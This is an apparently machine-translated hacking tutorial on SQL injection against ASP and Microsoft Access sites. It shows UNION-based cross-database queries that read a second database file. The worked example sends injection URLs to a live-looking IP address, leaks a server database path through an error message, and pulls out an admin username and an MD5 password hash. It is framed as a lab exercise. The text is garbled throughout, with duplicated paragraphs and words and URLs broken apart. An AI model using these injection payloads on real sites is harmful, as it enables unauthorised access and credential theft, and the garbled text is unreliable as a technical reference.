You still remember mssql's cross-database query. In fact, cross queries between two data items can be implemented in access. Next I will introduce the cross-database query of access. First, let's take a look at how to query mdb files in access. We can create an empty database to query the database D: daosdbdaidalos. mdb.
You still remember mssql's cross-database query. In fact, cross queries between two data items can be implemented in access. Next I will introduce the cross-database query of access. First, let's take a look at how to query mdb files in access. We can create an empty database to query the database D: \ daos \ db \ daidalos. mdb.
We still remember that mssql's cross-Database
QueryIn fact, it can also be used in access.
ImplementationCrossover between two data items
Query. Next I will introduce the cross-Database access
Query.
First, let's see how access
ImplementationFor mdb
FileProceed
QueryYou can create an empty database to view the admin table in database D: \ daos \ db \ daidalos. mdb.
Query, The SQL statement is:
SELECT * from admin in "D: \ daos \ db \ daidalos. mdb"
QueryThen, the contents in the admin table of the target database are returned:
In actual asp injection, two select statements are required at the same time. If you are familiar with php + mysql injection, it is easy to think of union
Query, We can still use in access, using union
QueryAnother advantage is that you should not guess the data one by one, the data in the field can be exposed directly like mysql + php injection (the specific mix has already written a detailed article ). As shown above
ImplementationCross-Database
QueryThe following two conditions are required:
Use union
QueryYou must know the number of fields in the table in the previous select statement.
You must know the location of the target database, absolute path.
Condition 1 can be manually guessed based on the error message, or automatically
Implementation.
Condition 2 is difficult, but we can use the "access brute-force library"
ImplementationSome people will say that since we can know the data location, we don't need to download the data directly. In fact, the current database generally prevents downloading, and some do not have the web directory at all.
The first level of the fourth round of the anti-DDoS pro lab is the two asp + access download systems. One is the rain point Download System and the other is the stolen handsome Download System. After testing, the hacker downloading system can expose the database, but does not allow the download. It seems that there is no injection, and the downloading system in the rain is full of loopholes. The database can be violent and can be directly downloaded, injection is also possible. However, the background of the rain point is very simple and there is nothing to use. Our goal is to get the password of the background of the hacker. I will show it to you, cross-database use of the injection points of the rain point system
QueryAnd get the hacker's background password:
We know that the list. asp of the rain point system can be injected. We first need to get the number of data table fields in the union, and submit:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 201% 20 from % 20 userinfo
Return Value:
Microsoft JET Database Engine error '80040e14'
In Union
QueryThe two selected data tables or
QueryThe number of columns in does not match.
/Yddown/list. asp, row 51
The field is incorrect. I wrote a perl script to automatically guess the field (see the code below)
When we submit:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 3%, 20 from % 20 userinfo
No error returned:
Haha! We have obtained the number of fields, and we can get my position in Field 1, which shows us
Query.
Now we are still at the database location where the hacker is handsome. Let's simply submit the following:
Http: // 219.237.81.46/dsdown % 5cregs. asp
Successful return path:
Microsoft JET Database Engine error '20140901'
'D: \ 111 \ db \ kljdsld. asa' is not a valid path. Check whether the path name is correctly spelled and whether it is connected.
FileStorage server.
/Dsdown/db/user. asp, Row 6
(Note: The obtained path is not necessarily "complete". The actual path is D: \ 111 \ dsdown \ db \ kljdsld. asa)
Next we construct a url across databases as follows:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20 admin, 3,2% 20 from % 20 admin % 20in % 20 "D: \ 111 \ dsdown \ db \ kljdsld. asa "% 20 where % 20id = 1
The preceding statement is, union
QueryData D: \ 111 \ db \ kljdsld. asa:
The username is admin, and then the brute-force password is obtained:
Http: // 219.237.81.46/yddown/list. asp? Id = 75% 20 union % 20 select % 20pws, 3,2% 20 from % 20 admin % 20in % 20 "D: \ 111 \ dsdown \ db \ kljdsld. asa "% 20 where % 20id = 1
Get a 32-bit md5 encrypted hash: 77e6cbb3f9468eadb655ae6826357922.
QuerySuccess. Here I just want to demonstrate the cross-Database
Query:).
Summary
This article mainly introduces two very useful methods. 1st we don't have to guess each character at the top of asp injection, so it is very troublesome to have Chinese characters, directly Using union instead of data can directly expose the data, regardless of whether it is a Chinese character or a special character, can be put in place in one step, 2nd is a cross-database, the use is very flexible, can let you during penetration, there are unexpected gains.